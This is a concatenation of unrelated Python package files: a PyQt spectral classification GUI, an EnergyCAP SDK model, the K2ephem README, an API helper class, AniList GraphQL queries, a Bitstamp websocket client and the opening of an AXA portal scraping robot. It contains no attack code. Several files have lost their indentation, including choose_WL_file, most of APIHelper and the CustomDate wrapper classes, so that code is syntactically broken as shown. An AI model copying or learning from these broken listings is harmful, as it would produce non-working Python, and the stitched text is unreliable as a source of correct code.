        fname_ROI, extension = QFileDialog.getOpenFileName(self, 'Choose ROI csv file.', self.imageDir+"/", "CSV (*.csv)")
        if fname_ROI == '':
            return

        # read the ROI data from the file
        ok, self.ROIdata = read_roi_file(fname_ROI)
        if not ok:
            return

        # ROI data was read, so set the file name in the GUI
        self.ROIfileText.setText('ROI File: '+fname_ROI)

        # determine the keys
        keys = self.ROIdata.keys()
        # set the number of rows to be number of ROIs
        self.table_view.setRowCount(len(keys))
        # fill in the data
        for idx, key in enumerate(keys):
            # name item
            name = QTableWidgetItem(self.ROIdata[key].name)
            name.setData(Qt.UserRole,QColor(100,130,155)) # sets the highlight color
            self.table_view.setItem(idx, 0, name)
            # color item
            c = self.ROIdata[key].color
            blank = QTableWidgetItem()
            blank.setFlags(blank.flags() & ~Qt.ItemIsEditable)
            blank.setBackground(QColor(c[0], c[1], c[2]))
            blank.setData(Qt.UserRole,QColor(c[0], c[1], c[2])) # sets the highlight color
            self.table_view.setItem(idx, 1,blank )
            # number of points item
            npts = QTableWidgetItem(str(self.ROIdata[key].npts))
            npts.setFlags(npts.flags() & ~Qt.ItemIsEditable)
            npts.setData(Qt.UserRole,QColor(100,130,155)) # sets the highlight color
            self.table_view.setItem(idx, 2, npts)
            # store the key for this ROI in the last item
            ROIkey = QTableWidgetItem(key)
            self.table_view.setItem(idx, 3, ROIkey)
        self.table_view.setItemDelegate(self.ColorDelegate()) # sets the background colors when selected
        self.wl = self.ROIdata[key].wl
def choose_WL_file(self):
fname_WL = QFileDialog.getOpenFileName(self, 'Choose Image file with wavelengths.')
if fname_WL == '':
return
try:
im = envi.open(fname_WL+'.hdr')
except:
# sometimes images are saved with ".img" or similar suffix that must be removed from header
im_fname_nosuffix = fname_WL[:fname_WL.rfind(".")]
self.im = envi.open(im_fname_nosuffix+'.hdr', fname_WL)
self.ROIfileText.setText('Image wl File: '+fname_WL)
self.wl = self.im.bands.centers
    def full_analysis(self):
        """Train classifiers on the selected ROIs and show the results viewer.

        Requires at least two selected rows.  Builds the selected-ROI data,
        runs the chosen classification methods, opens the results GUI, then
        computes any requested dimension-reduction scatterplots.

        NOTE(review): ``self.DTclassificationCheckBox`` is never consulted
        here, so the Decision Tree option has no effect — TODO confirm
        whether classification.ROI_class_learner supports a 'DT' method and
        wire it up.
        """
        # determine the selected ROIs
        SelectedROIdata = {}
        selected_rows = sorted(set(index.row() for index in
                                   self.table_view.selectedIndexes()))

        # return if no rows are selected
        if len(selected_rows) < 2:
            self.select_ROIs_message()
            return

        # build the ROI data for the selected rows
        self.class_names = []
        for rowIdx in selected_rows:
            # hidden column 3 holds the ROI key; column 0 the display name
            key = self.table_view.item(rowIdx,3).text()
            name = self.table_view.item(rowIdx,0).text()
            self.class_names.append(name)
            SelectedROIdata[name] = self.ROIdata[key]

        # determine which classification methods the user has selected
        methods = []
        if self.LDAclassificationCheckBox.isChecked():
            methods.append('LDA')
        if self.QDAclassificationCheckBox.isChecked():
            methods.append('QDA')
        if self.RFclassificationCheckBox.isChecked():
            methods.append('RF')

        # Compute the classification analysis
        self.learners, self.validation = classification.ROI_class_learner(SelectedROIdata, self.wl, methods)
        self.classAnalysisResultsGUI = classificationResultsViewer.classAnalysisResultsGUI(parent=self, settings=self.settings)
        self.classAnalysisResultsGUI.show()

        # determine which plot methods the user has selected
        methods = []
        if self.ScatterplotPCACheckBox.isChecked():
            methods.append('PCA')
        if self.ScatterplotLDACheckBox.isChecked():
            methods.append('LDA')

        # create the requested plots
        self.plot_data = classification.dimension_reduction_plots(SelectedROIdata, methods)
        #self.classificationResultsViewer = classificationResultsViewer.classificationResultsViewer(settings=self.settings,
        #                                                                    methods=methods,
        #                                                                    learners=self.learners,
        #                                                                    validation=self.validation,
        #                                                                    plot_data=self.plot_data)
    def classify_image(self):
        """Apply the trained classifiers to a user-selected ENVI image and
        save per-method classification (and probability) images next to it.

        Requires self.learners to be populated (run full_analysis first) and
        the image bands to match the ROI wavelength axis exactly.

        NOTE(review): ``os`` and ``np`` are assumed to come from the
        ``from .specTools import *`` star import — confirm.  The band
        comparison ``(... == self.wl).all()`` presumes numpy-array operands.
        """
        # Select the image
        prompt = 'Select an image'
        if self.imageDir is None:
            self.im_fname, extension = QFileDialog.getOpenFileName(self, prompt)
        else:
            # fall back to no start directory if imageDir is unusable
            try:
                self.im_fname, extension = QFileDialog.getOpenFileName(self, prompt, self.imageDir)
            except:
                self.im_fname, extension = QFileDialog.getOpenFileName(self, prompt)
        if self.im_fname == '':
            return
        dummy,ok = specTools.is_image_file(self.im_fname)
        if not ok:
            QMessageBox.warning(self,"File is not valid ENVI image",
                    "File Name: %s"%(os.path.basename(self.im_fname)))
            return
        # remember the directory for the next file dialog
        self.imageDir = os.path.dirname(os.path.abspath(self.im_fname))

        # load the image
        try:
            # this will work if the filename has no suffix
            im_fname_nosuffix = self.im_fname
            self.im = envi.open(self.im_fname+'.hdr')
        except:
            # this will work if the filename has a suffix
            im_fname_nosuffix = self.im_fname[:self.im_fname.rfind(".")]
            self.im = envi.open(im_fname_nosuffix+'.hdr', self.im_fname)
        self.im_arr = specTools.envi_load(self.im)
        [nRows,nCols,nBands] = np.shape(self.im_arr)

        # check the bands: both the count and the center values must match
        band_check = True
        if nBands == len(self.wl):
            if not (self.im.bands.centers == self.wl).all():
                band_check = False
        else:
            band_check = False
        if band_check == False:
            QMessageBox.warning(self, "Band Mismatch","Image bands must match ROI spectra bands.")
            return

        # NOTE(review): "calssification" is the helper's actual (misspelled)
        # name in the classification module
        class_results, prob_results = classification.image_calssification(self.im_arr, self.learners)

        # save the classification results
        for learnerMethod in self.learners.keys():
            envi.save_classification(
                im_fname_nosuffix+'_class_'+learnerMethod+'.hdr',
                class_results[learnerMethod],
                class_names = self.ROIdata.keys(),
                class_colors = [self.ROIdata[key].color for key in self.ROIdata.keys()], force=True)
            # probability images are best-effort; some learners provide none
            try:
                envi.save_image(im_fname_nosuffix+'_probability_'+learnerMethod+'.hdr',
                            prob_results[learnerMethod],
                            metadata={'band names': self.ROIdata.keys(), 'default stretch': '0.500000 1.000000 linear'},
                            ext='', force=True)
            except:
                pass
if __name__ == "__main__":
    # Launch the Class Analysis window as a standalone application
    application = QApplication(argv)
    main_window = classAnalysisGUI()
    main_window.show()
    application.exec_()
/EnergyCapSdk-8.2304.4743.tar.gz/EnergyCapSdk-8.2304.4743/energycap/sdk/models/abnormal_bill_cost_with_outlier_analysis_setting_response.py |
from msrest.serialization import Model
class AbnormalBillCostWithOutlierAnalysisSettingResponse(Model):
    """AbnormalBillCostWithOutlierAnalysisSettingResponse.

    Audit-setting response for the "abnormal bill cost with outlier
    analysis" check.

    :param sensitivity: Minimum outlier sensitivity for abnormal cost analysis
     Possible values - severe, high, moderate
     If SettingStatus is set to Skip and no value is provided, EnergyCAP
     default will be set
    :type sensitivity: str
    :param setting_status: The status of the audit setting - Possible values
     Check, Hold, Skip
    :type setting_status: str
    :param setting_code: The setting code
    :type setting_code: str
    :param setting_description: A description of the setting
    :type setting_description: str
    :param minimum_cost: Minimum Bill/Meter Cost.
     This audit will run only when the cost meets the specified minimum cost
    :type minimum_cost: int
    :param assignees: List of Assignees.
     UserChildDTO representing the users the flag should get assigned to when
     the audit fails.
    :type assignees: list[~energycap.sdk.models.UserChild]
    """

    # Maps Python attribute names to their JSON keys for (de)serialization
    _attribute_map = {
        'sensitivity': {'key': 'sensitivity', 'type': 'str'},
        'setting_status': {'key': 'settingStatus', 'type': 'str'},
        'setting_code': {'key': 'settingCode', 'type': 'str'},
        'setting_description': {'key': 'settingDescription', 'type': 'str'},
        'minimum_cost': {'key': 'minimumCost', 'type': 'int'},
        'assignees': {'key': 'assignees', 'type': '[UserChild]'},
    }

    def __init__(self, **kwargs):
        """Initialize the response; all fields default to None when absent."""
        super(AbnormalBillCostWithOutlierAnalysisSettingResponse, self).__init__(**kwargs)
        self.sensitivity = kwargs.get('sensitivity', None)
        self.setting_status = kwargs.get('setting_status', None)
        self.setting_code = kwargs.get('setting_code', None)
        self.setting_description = kwargs.get('setting_description', None)
        self.minimum_cost = kwargs.get('minimum_cost', None)
        self.assignees = kwargs.get('assignees', None)
/K2ephem-1.5.1.tar.gz/K2ephem-1.5.1/README.md | # K2ephem [](https://pypi.python.org/pypi/K2ephem/) [](https://travis-ci.org/KeplerGO/K2ephem) [](http://dx.doi.org/10.5281/zenodo.44363)
***Checks whether a Solar System body is (or was) observable by [NASA's K2 mission](http://keplerscience.arc.nasa.gov).***
[NASA's K2 mission](http://keplerscience.arc.nasa.gov) is using
the unique assets of the repurposed Kepler space telescope
to perform long-baseline, high-cadence, high-precision photometry
of targets selected by the community.
Unlike the original Kepler mission, the loss of two reaction wheels
requires K2 to point near the ecliptic plane.
As a result, K2 can provide high-precision lightcurves
for large numbers of asteroids, comets, and (dwarf) planets.
This repository provides a command-line tool that uses the JPL/Horizons
service to check whether a Solar System body is (or was) in the footprint
of one of the past or future [K2 Campaign fields](http://keplerscience.arc.nasa.gov/k2-fields.html).
## Installation
You need to have a working version of Python installed.
If this requirement is met, you can install the latest stable version
of `K2ephem` using pip:
```
$ pip install K2ephem
```
If you have a previous version installed, you can upgrade it using:
```
pip install K2ephem --upgrade
```
Or you can install the most recent development version
from the git repository as follows:
```
$ git clone https://github.com/KeplerGO/K2ephem.git
$ cd K2ephem
$ python setup.py install
```
The `setup.py` script will automatically take care of installing two required dependencies (`K2fov` and `pandas`).
## Usage
After installation, you can call `K2ephem` from the command line.
For example, to verify whether comet *Chiron* can be observed by K2,
simply type:
```
K2ephem Chiron
```
Or you can type `K2ephem --help` to see the detailed usage instructions:
```
$ K2ephem --help
usage: K2ephem [-h] [--first campaign] [--last campaign] [-p] target
Check if a Solar System object is (or was) observable by NASA's K2 mission.
This command will query JPL/Horizons to find out.
positional arguments:
target Name of the target. Must be known to JPL/Horizons.
optional arguments:
-h, --help show this help message and exit
--first campaign First campaign to check (default: 0)
--last campaign Final campaign to check (default: 18)
-p, --plot Produce plot showing the object position with respect to
each campaign.
```
## Background
The [JPL/Horizons](http://ssd.jpl.nasa.gov/horizons.cgi)
ephemeris service allows users to predict the position
of Solar System bodies in the sky as seen from the Kepler/K2 spacecraft.
This can be achieved by entering `@-227` as the "Observer Location".
Setting the location to be the Kepler spacecraft is *crucial*,
because Kepler is more than 0.5 AU away from the Earth!
## Attribution
Created by Geert Barentsen for the NASA Kepler/K2 Guest Observer Office.
If this tool aided your research, please cite it using the [DOI identifier](http://dx.doi.org/10.5281/zenodo.44363)
or the following BibTeX entry:
```
@misc{geert_barentsen_2016_44363,
author = {Geert Barentsen},
title = {K2ephem: v1.1.1},
month = jan,
year = 2016,
doi = {10.5281/zenodo.44363},
url = {http://dx.doi.org/10.5281/zenodo.44363}
}
```
| PypiClean |
/Md-Notes-api-1.0.0.tar.gz/Md-Notes-api-1.0.0/mdnotes/api_helper.py | import re
import sys
import datetime
import calendar
import email.utils as eut
from time import mktime
import jsonpickle
import dateutil.parser
from requests.utils import quote
class APIHelper(object):
"""A Helper Class for various functions associated with API Calls.
This class contains static methods for operations that need to be
performed during API requests. All of the methods inside this class are
static methods, there is no need to ever initialise an instance of this
class.
"""
@staticmethod
def merge_dicts(dict1, dict2):
"""Merges two dictionaries into one as a shallow copy.
Args:
dict1 (dict): The first dictionary.
dict2 (dict): The second dictionary.
Returns:
dict: A dictionary containing key value pairs
from both the argument dictionaries. In the case
of a key conflict, values from dict2 are used
and those from dict1 are lost.
"""
temp = dict1.copy()
temp.update(dict2)
return temp
@staticmethod
def json_serialize(obj):
"""JSON Serialization of a given object.
Args:
obj (object): The object to serialize.
Returns:
str: The JSON serialized string of the object.
"""
if obj is None:
return None
# Resolve any Names if it's one of our objects that needs to have this called on
if isinstance(obj, list):
value = list()
for item in obj:
if hasattr(item, "_names"):
value.append(APIHelper.to_dictionary(item))
else:
value.append(item)
obj = value
else:
if hasattr(obj, "_names"):
obj = APIHelper.to_dictionary(obj)
return jsonpickle.encode(obj, False)
@staticmethod
def json_deserialize(json, unboxing_function=None, as_dict=False):
"""JSON Deserialization of a given string.
Args:
json (str): The JSON serialized string to deserialize.
Returns:
dict: A dictionary representing the data contained in the
JSON serialized string.
"""
if json is None:
return None
try:
decoded = jsonpickle.decode(json)
except ValueError:
return json
if unboxing_function is None:
return decoded
if as_dict:
return {k: unboxing_function(v) for k, v in decoded.items()}
elif isinstance(decoded, list):
return [unboxing_function(element) for element in decoded]
else:
return unboxing_function(decoded)
@staticmethod
def serialize_array(key, array, formatting="indexed"):
"""Converts an array parameter to a list of key value tuples.
Args:
key (str): The name of the parameter.
array (list): The value of the parameter.
formatting (str): The type of key formatting expected.
Returns:
list: A list with key value tuples for the array elements.
"""
tuples = []
if sys.version_info[0] < 3:
serializable_types = (str, int, long, float, bool, datetime.date, APIHelper.CustomDate)
else:
serializable_types = (str, int, float, bool, datetime.date, APIHelper.CustomDate)
if isinstance(array[0], serializable_types):
if formatting == "unindexed":
tuples += [("{0}[]".format(key), element) for element in array]
elif formatting == "indexed":
tuples += [("{0}[{1}]".format(key, index), element) for index, element in enumerate(array)]
elif formatting == "plain":
tuples += [(key, element) for element in array]
else:
raise ValueError("Invalid format provided.")
else:
tuples += [("{0}[{1}]".format(key, index), element) for index, element in enumerate(array)]
return tuples
@staticmethod
def append_url_with_template_parameters(url, parameters):
"""Replaces template parameters in the given url.
Args:
url (str): The query url string to replace the template parameters.
parameters (dict): The parameters to replace in the url.
Returns:
str: URL with replaced parameters.
"""
# Parameter validation
if url is None:
raise ValueError("URL is None.")
if parameters is None:
return url
# Iterate and replace parameters
for key in parameters:
value = parameters[key]['value']
encode = parameters[key]['encode']
replace_value = ''
# Load parameter value
if value is None:
replace_value = ''
elif isinstance(value, list):
replace_value = "/".join((quote(str(x), safe='') if encode else str(x)) for x in value)
else:
replace_value = quote(str(value), safe='') if encode else str(value)
url = url.replace('{{{0}}}'.format(key), str(replace_value))
return url
@staticmethod
def append_url_with_query_parameters(url,
parameters,
array_serialization="indexed"):
"""Adds query parameters to a URL.
Args:
url (str): The URL string.
parameters (dict): The query parameters to add to the URL.
array_serialization (str): The format of array parameter serialization.
Returns:
str: URL with added query parameters.
"""
# Parameter validation
if url is None:
raise ValueError("URL is None.")
if parameters is None:
return url
for key, value in parameters.items():
seperator = '&' if '?' in url else '?'
if value is not None:
if isinstance(value, list):
value = [element for element in value if element]
if array_serialization == "csv":
url += "{0}{1}={2}".format(
seperator,
key,
",".join(quote(str(x), safe='') for x in value)
)
elif array_serialization == "psv":
url += "{0}{1}={2}".format(
seperator,
key,
"|".join(quote(str(x), safe='') for x in value)
)
elif array_serialization == "tsv":
url += "{0}{1}={2}".format(
seperator,
key,
"\t".join(quote(str(x), safe='') for x in value)
)
else:
url += "{0}{1}".format(
seperator,
"&".join(("{0}={1}".format(k, quote(str(v), safe='')))
for k, v in APIHelper.serialize_array(key, value, array_serialization))
)
else:
url += "{0}{1}={2}".format(seperator, key, quote(str(value), safe=''))
return url
@staticmethod
def clean_url(url):
"""Validates and processes the given query Url to clean empty slashes.
Args:
url (str): The given query Url to process.
Returns:
str: Clean Url as string.
"""
# Ensure that the urls are absolute
regex = "^https?://[^/]+"
match = re.match(regex, url)
if match is None:
raise ValueError('Invalid Url format.')
protocol = match.group(0)
index = url.find('?')
query_url = url[len(protocol): index if index != -1 else None]
query_url = re.sub("//+", "/", query_url)
parameters = url[index:] if index != -1 else ""
return protocol + query_url + parameters
@staticmethod
def form_encode_parameters(form_parameters,
array_serialization="indexed"):
"""Form encodes a dictionary of form parameters
Args:
form_parameters (dictionary): The given dictionary which has
atleast one model to form encode.
array_serialization (str): The format of array parameter serialization.
Returns:
dict: A dictionary of form encoded properties of the model.
"""
encoded = []
for key, value in form_parameters.items():
encoded += APIHelper.form_encode(value, key, array_serialization)
return encoded
@staticmethod
def form_encode(obj,
instance_name,
array_serialization="indexed"):
"""Encodes a model in a form-encoded manner such as person[Name]
Args:
obj (object): The given Object to form encode.
instance_name (string): The base name to appear before each entry
for this object.
array_serialization (string): The format of array parameter serialization.
Returns:
dict: A dictionary of form encoded properties of the model.
"""
retval = []
# If we received an object, resolve it's field names.
if hasattr(obj, "_names"):
obj = APIHelper.to_dictionary(obj)
if obj is None:
return []
elif isinstance(obj, list):
for element in APIHelper.serialize_array(instance_name, obj, array_serialization):
retval += APIHelper.form_encode(element[1], element[0], array_serialization)
elif isinstance(obj, dict):
for item in obj:
retval += APIHelper.form_encode(obj[item], instance_name + "[" + item + "]", array_serialization)
else:
retval.append((instance_name, obj))
return retval
@staticmethod
def to_dictionary(obj):
"""Creates a dictionary representation of a class instance. The
keys are taken from the API description and may differ from language
specific variable names of properties.
Args:
obj: The object to be converted into a dictionary.
Returns:
dictionary: A dictionary form of the model with properties in
their API formats.
"""
dictionary = dict()
# Loop through all properties in this model
for name in obj._names:
value = getattr(obj, name)
if isinstance(value, list):
# Loop through each item
dictionary[obj._names[name]] = list()
for item in value:
dictionary[obj._names[name]].append(APIHelper.to_dictionary(item) if hasattr(item, "_names") else item)
elif isinstance(value, dict):
# Loop through each item
dictionary[obj._names[name]] = dict()
for key in value:
dictionary[obj._names[name]][key] = APIHelper.to_dictionary(value[key]) if hasattr(value[key], "_names") else value[key]
else:
dictionary[obj._names[name]] = APIHelper.to_dictionary(value) if hasattr(value, "_names") else value
# Loop through all additional properties in this model
for name in obj.additional_properties:
value = obj.additional_properties.get(name)
if isinstance(value, list):
# Loop through each item
dictionary[name] = list()
for item in value:
dictionary[name].append(APIHelper.to_dictionary(item) if hasattr(item, "additional_properties") else item)
elif isinstance(value, dict):
# Loop through each item
dictionary[name] = dict()
for key in value:
dictionary[name][key] = APIHelper.to_dictionary(value[key]) if hasattr(value[key], "additional_properties") else value[key]
else:
dictionary[name] = APIHelper.to_dictionary(value) if hasattr(value, "additional_properties") else value
# Return the result
return dictionary
@staticmethod
def when_defined(func, value):
return func(value) if value else None
class CustomDate(object):
""" A base class for wrapper classes of datetime.
This class contains methods which help in
appropriate serialization of datetime objects.
"""
def __init__(self, dtime, value=None):
self.datetime = dtime
if not value:
self.value = self.from_datetime(dtime)
else:
self.value = value
def __repr__(self):
return str(self.value)
def __getstate__(self):
return self.value
def __setstate__(self, state):
pass
    class HttpDateTime(CustomDate):

        """ A wrapper class for datetime to support HTTP date format."""

        @classmethod
        def from_datetime(cls, date_time):
            # Produce an RFC 1123 HTTP date, e.g. "Sun, 06 Nov 1994 08:49:37 GMT".
            # NOTE(review): time.mktime treats date_time as *local* time --
            # confirm callers pass local-time datetimes here.
            return eut.formatdate(timeval=mktime(date_time.timetuple()),
                                  localtime=False, usegmt=True)

        @classmethod
        def from_value(cls, value):
            # Parse an HTTP date string back into a datetime, keeping the
            # original string as the serialized value.
            dtime = datetime.datetime.fromtimestamp(eut.mktime_tz(eut.parsedate_tz(value)))
            return cls(dtime, value)
    class UnixDateTime(CustomDate):

        """ A wrapper class for datetime to support Unix date format."""

        @classmethod
        def from_datetime(cls, date_time):
            # Seconds since the epoch, interpreting date_time as UTC.
            return calendar.timegm(date_time.utctimetuple())

        @classmethod
        def from_value(cls, value):
            # Accepts int/float/str timestamps; the serialized value is the
            # float form.
            dtime = datetime.datetime.utcfromtimestamp(float(value))
            return cls(dtime, float(value))
class RFC3339DateTime(CustomDate):
""" A wrapper class for datetime to support Rfc 3339 format."""
@classmethod
def from_datetime(cls, date_time):
return date_time.isoformat()
@classmethod
def from_value(cls, value):
dtime = dateutil.parser.parse(value)
return cls(dtime, value) | PypiClean |
/Kadal-0.2.6.tar.gz/Kadal-0.2.6/kadal/query.py | MEDIA_SEARCH = """
query ($search: String, $type: MediaType, $exclude: MediaFormat, $isAdult: Boolean) {
Media(search: $search, type: $type, format_not: $exclude, isAdult: $isAdult) {
id
type
format
title {
english
romaji
native
}
synonyms
status
description
startDate {
year
month
day
}
endDate {
year
month
day
}
episodes
chapters
volumes
coverImage {
large
color
}
bannerImage
genres
averageScore
siteUrl
nextAiringEpisode {
timeUntilAiring
episode
}
}
}
"""
# GraphQL query: fetch a single anime/manga entry by its AniList id.
MEDIA_BY_ID = """
query ($id: Int, $type: MediaType) {
Media(id: $id, type: $type) {
id
type
format
title {
english
romaji
native
}
synonyms
status
description
startDate {
year
month
day
}
endDate {
year
month
day
}
episodes
chapters
coverImage {
large
color
}
bannerImage
genres
averageScore
siteUrl
nextAiringEpisode {
timeUntilAiring
episode
}
}
}
"""
# GraphQL query: paginated media search (defaults to SEARCH_MATCH ordering),
# with optional format exclusion and adult-content filtering.
MEDIA_PAGED = """
query (
$id: Int,
$page: Int,
$perPage: Int,
$search: String,
$type: MediaType,
$sort: [MediaSort] = [SEARCH_MATCH],
$exclude: MediaFormat,
$isAdult: Boolean
) {
Page(page: $page, perPage: $perPage) {
media(id: $id, search: $search, type: $type, sort: $sort, format_not: $exclude, isAdult: $isAdult) {
id
type
format
title {
english
romaji
native
}
synonyms
status
description
startDate {
year
month
day
}
endDate {
year
month
day
}
episodes
chapters
volumes
coverImage {
large
color
}
bannerImage
genres
averageScore
siteUrl
popularity
}
}
}
"""
# GraphQL query: look up a user profile by name.
USER_SEARCH = """
query ($search: String) {
User(search: $search) {
id
name
html_about: about(asHtml: true)
about
avatar {
large
}
bannerImage
siteUrl
stats {
watchedTime
chaptersRead
}
}
}
"""
# GraphQL query: look up a user profile by numeric id.
USER_BY_ID = """
query ($id: Int) {
User(id: $id) {
id
name
html_about: about(asHtml: true)
about
avatar {
large
}
bannerImage
siteUrl
stats {
watchedTime
chaptersRead
}
}
}
"""
/BuzzAlgoTrade-0.0.2.tar.gz/BuzzAlgoTrade-0.0.2/pyalgotrade/bitstamp/wsclient.py | import datetime
import threading
import Queue
from pyalgotrade.websocket import pusher
from pyalgotrade.bitstamp import common
def get_current_datetime():
    """Return the current local wall-clock time as a naive datetime."""
    now = datetime.datetime.now()
    return now
# Bitstamp protocol reference: https://www.bitstamp.net/websocket/
class Trade(pusher.Event):
    """A single executed trade pushed by Bitstamp."""

    def __init__(self, dateTime, eventDict):
        super(Trade, self).__init__(eventDict, True)
        self.__dateTime = dateTime

    def _field(self, name):
        # All trade attributes live in the event's data payload.
        return self.getData()[name]

    def getDateTime(self):
        """Returns the :class:`datetime.datetime` when this event was received."""
        return self.__dateTime

    def getId(self):
        """Returns the trade id."""
        return self._field("id")

    def getPrice(self):
        """Returns the trade price."""
        return self._field("price")

    def getAmount(self):
        """Returns the trade amount."""
        return self._field("amount")

    def isBuy(self):
        """Returns True if the trade was a buy."""
        return self._field("type") == 0

    def isSell(self):
        """Returns True if the trade was a sell."""
        return self._field("type") == 1
class OrderBookUpdate(pusher.Event):
    """A snapshot of the top of the Bitstamp order book."""

    def __init__(self, dateTime, eventDict):
        super(OrderBookUpdate, self).__init__(eventDict, True)
        self.__dateTime = dateTime

    def _column(self, side, index):
        # Each side ("bids"/"asks") is a list of [price, volume] pairs;
        # extract one column as floats.
        return [float(entry[index]) for entry in self.getData()[side]]

    def getDateTime(self):
        """Returns the :class:`datetime.datetime` when this event was received."""
        return self.__dateTime

    def getBidPrices(self):
        """Returns a list with the top 20 bid prices."""
        return self._column("bids", 0)

    def getBidVolumes(self):
        """Returns a list with the top 20 bid volumes."""
        return self._column("bids", 1)

    def getAskPrices(self):
        """Returns a list with the top 20 ask prices."""
        return self._column("asks", 0)

    def getAskVolumes(self):
        """Returns a list with the top 20 ask volumes."""
        return self._column("asks", 1)
class WebSocketClient(pusher.WebSocketClient):
    """Bitstamp-specific Pusher websocket client.

    Translates incoming Pusher messages into :class:`Trade` and
    :class:`OrderBookUpdate` events and pushes them, along with connection
    state changes, onto an internal queue as (event_code, payload) tuples
    for another thread to consume.
    """

    # Bitstamp's public Pusher application key.
    PUSHER_APP_KEY = "de504dc5763aeef9ff52"

    # Events
    # Event codes used as the first element of queued tuples.
    ON_TRADE = 1
    ON_ORDER_BOOK_UPDATE = 2
    ON_CONNECTED = 3
    ON_DISCONNECTED = 4

    def __init__(self):
        # NOTE(review): the meaning of the second argument (5) is defined by
        # pusher.WebSocketClient (likely a protocol version or timeout) --
        # confirm against that class.
        super(WebSocketClient, self).__init__(WebSocketClient.PUSHER_APP_KEY, 5)
        self.__queue = Queue.Queue()

    def getQueue(self):
        # Consumers poll this queue for (event_code, payload) tuples.
        return self.__queue

    def onMessage(self, msg):
        # If we can't handle the message, forward it to Pusher WebSocketClient.
        event = msg.get("event")
        if event == "trade":
            self.onTrade(Trade(get_current_datetime(), msg))
        elif event == "data" and msg.get("channel") == "order_book":
            self.onOrderBookUpdate(OrderBookUpdate(get_current_datetime(), msg))
        else:
            super(WebSocketClient, self).onMessage(msg)

    ######################################################################
    # WebSocketClientBase events.

    def onOpened(self):
        pass

    def onClosed(self, code, reason):
        common.logger.info("Closed. Code: %s. Reason: %s." % (code, reason))
        self.__queue.put((WebSocketClient.ON_DISCONNECTED, None))

    def onDisconnectionDetected(self):
        # Best-effort shutdown; the consumer is notified either way.
        common.logger.warning("Disconnection detected.")
        try:
            self.stopClient()
        except Exception, e:
            common.logger.error("Error stopping websocket client: %s." % (str(e)))
        self.__queue.put((WebSocketClient.ON_DISCONNECTED, None))

    ######################################################################
    # Pusher specific events.

    def onConnectionEstablished(self, event):
        # Subscribe to both Bitstamp channels before signalling readiness.
        common.logger.info("Connection established.")
        self.subscribeChannel("live_trades")
        self.subscribeChannel("order_book")
        self.__queue.put((WebSocketClient.ON_CONNECTED, None))

    def onError(self, event):
        common.logger.error("Error: %s" % (event))

    def onUnknownEvent(self, event):
        common.logger.warning("Unknown event: %s" % (event))

    ######################################################################
    # Bitstamp specific

    def onTrade(self, trade):
        self.__queue.put((WebSocketClient.ON_TRADE, trade))

    def onOrderBookUpdate(self, orderBookUpdate):
        self.__queue.put((WebSocketClient.ON_ORDER_BOOK_UPDATE, orderBookUpdate))
class WebSocketClientThread(threading.Thread):
    """Runs a :class:`WebSocketClient` event loop on its own thread."""

    def __init__(self):
        super(WebSocketClientThread, self).__init__()
        self.__wsClient = WebSocketClient()

    def getQueue(self):
        # Expose the client's event queue to the owning thread.
        return self.__wsClient.getQueue()

    def start(self):
        # Connect synchronously first so start() fails fast on connection
        # errors, then launch the event loop thread.
        self.__wsClient.connect()
        super(WebSocketClientThread, self).start()

    def run(self):
        # Blocks until the client is stopped.
        self.__wsClient.startClient()

    def stop(self):
        # Best-effort stop; errors are logged, not raised.
        try:
            common.logger.info("Stopping websocket client.")
            self.__wsClient.stopClient()
        except Exception, e:
            common.logger.error("Error stopping websocket client: %s." % (str(e)))
/IPRA_SESG-3.20.51-py3-none-any.whl/ipra/Model/Robot/axaRobotOld.py | from ipra.Model.Robot.baseRobot import BaseRobot
from bs4 import BeautifulSoup
import time
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import xlsxwriter
import threading
from genericpath import exists
class DeperacatedAxaRobot(BaseRobot):
    """Selenium robot that scrapes AXA policy pages and builds an Excel report.

    Flow: after a manual login is detected, ``scrapPolicy`` saves each
    policy's HTML to ``<reportPath>/<policy>.txt`` and feeds two work queues
    (``buildReportQueue``/``buildHeaderQueue``) consumed by the report/header
    builder threads.  The "half flow"/"Only" variants rebuild the report
    offline from previously saved files under ``inputPath``.

    Note: the class name's "Deperacated" spelling is kept for backward
    compatibility with existing callers.
    """

    def __init__(self, policyList, frame, reportPath,inputPath,downloadReport):
        super(DeperacatedAxaRobot, self).__init__(policyList, frame, reportPath,inputPath,downloadReport)
        self.logger.writeLogString('AXA-INIT','ROBOT INIT')
        # Used by the builder threads to know when all policies are handled.
        self.maxPolicyListSize = len(policyList)
        self.workbook = xlsxwriter.Workbook(self.reportPath+'AXA_report.xlsx')
        self.worksheet = self.workbook.add_worksheet()
        self.worksheet.write(0, 0, "Policy No.")
        self.logger.writeLogString('AXA-INIT','maxPolicyListSize:'+str(self.maxPolicyListSize))

    def waitingLoginComplete(self):
        """Open the AXA search page and poll until a manual login succeeds."""
        self.logger.writeLogString('AXA-LOGIN','START LOGIN')
        # self.browser.get("https://www.axa.com.hk/zh/login#?Tab$login-tab=consultant-login")
        # self.browser.find_element(By.XPATH,"/html/body/div/div/div[2]/div[3]/div/div/div[1]/div[2]/div[3]/div/div/div/div[2]/div/div[5]/div/div/button").click()
        # self.browser.close()
        # self.browser.switch_to.window(self.browser.window_handles[0])
        url_link = "https://axaiprooffice.force.com/_ui/search/ui/UnifiedSearchResults?searchType=2&sen=a00&sen=001&sen=005&str=0"
        self.browser.get(url_link)
        self.frame.setStatusLableText(self.stringValue.waitingLogin.get())
        # Poll every 10s (element wait) + 3s sleep until the post-login
        # element appears or the user aborts.
        while not self.isLogin and not self.isStopped:
            try:
                WebDriverWait(self.browser, 10).until(EC.presence_of_element_located((By.XPATH, "/html/body/div/div[4]/div/ul/li[1]/span")))
                self.isLogin=True
            except:
                time.sleep(3)
            else:
                pass
        if self.isLogin:
            self.frame.setStatusLableText(self.stringValue.loginSuccess.get())
            self.logger.writeLogString('AXA-LOGIN','LOGIN COMPLETED')

    def scrapPolicy(self):
        """Fetch each policy's page in a new tab and save its HTML to disk."""
        url_link = "https://axaiprooffice.force.com/_ui/search/ui/UnifiedSearchResults?searchType=2&sen=a00&sen=001&sen=005&str={}"
        for policy in self.policyList:
            if self.isStopped:
                return
            self.frame.setStatusLableText(self.stringValue.processing.get().format(str(policy)))
            self.logger.writeLogString('AXA','PROCESSING:'+str(policy))
            policy_url_link = url_link.format(policy)
            #self.browser.execute_script(policy_url_link)
            self.browser.switch_to.new_window('tab')
            self.browser.switch_to.window(self.browser.window_handles[1])
            self.browser.get(policy_url_link)
            try:
                self.browser.find_element(By.LINK_TEXT,policy).click()
